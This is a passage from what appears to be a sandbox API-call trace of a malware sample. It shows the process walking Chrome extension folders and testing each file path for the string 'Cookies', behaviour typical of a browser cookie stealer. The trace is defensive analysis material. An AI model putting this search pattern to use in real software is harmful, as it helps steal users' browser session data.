Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.303] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.303] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.303] lstrlenW (lpString="it") returned 2 [0163.304] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.304] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="it" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it" [0163.304] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it" [0163.304] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\*.*" [0163.304] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a42c90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a42c90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.304] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.304] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a42c90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a42c90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.304] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.304] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.304] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a43460, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.304] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it") returned 137 [0163.304] lstrlenW (lpString="\\") returned 1 [0163.304] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it" [0163.304] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\" [0163.304] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\") returned 138 [0163.304] lstrlenW (lpString="messages.json") returned 13 [0163.304] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\" [0163.304] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json" [0163.305] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json", lpSrch="Cookies") returned 0x0 [0163.305] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a43460, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.305] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.305] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a42c90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a42c90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="ja", cAlternateFileName="")) returned 1 [0163.305] lstrcmpiW (lpString1="ja", lpString2=".") returned 1 [0163.305] lstrcmpiW (lpString1="ja", lpString2="..") returned 1 [0163.305] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.305] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.305] lstrlenW (lpString="\\") returned 1 [0163.305] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.305] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.305] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.305] lstrlenW (lpString="ja") returned 2 [0163.305] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.305] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="ja" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja" [0163.305] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja" [0163.305] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\*.*" [0163.305] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a42c90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a42c90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.305] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.306] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a42c90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a42c90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.306] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.306] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.306] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a43460, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.306] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja") returned 137 [0163.306] lstrlenW (lpString="\\") returned 1 [0163.306] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja" [0163.306] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\" [0163.306] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\") returned 138 [0163.306] lstrlenW (lpString="messages.json") returned 13 [0163.306] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\" [0163.306] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json" [0163.306] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\messages.json", lpSrch="Cookies") returned 0x0 [0163.306] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a43460, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.306] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.306] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a42c90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a42c90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="ko", cAlternateFileName="")) returned 1 [0163.306] lstrcmpiW (lpString1="ko", lpString2=".") returned 1 [0163.306] lstrcmpiW (lpString1="ko", lpString2="..") returned 1 [0163.306] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.306] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.306] lstrlenW (lpString="\\") returned 1 [0163.306] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.307] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.307] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.307] lstrlenW (lpString="ko") returned 2 [0163.307] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.307] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="ko" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko" [0163.307] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko" [0163.307] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\*.*" [0163.307] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a42c90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a42c90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.307] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.307] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, 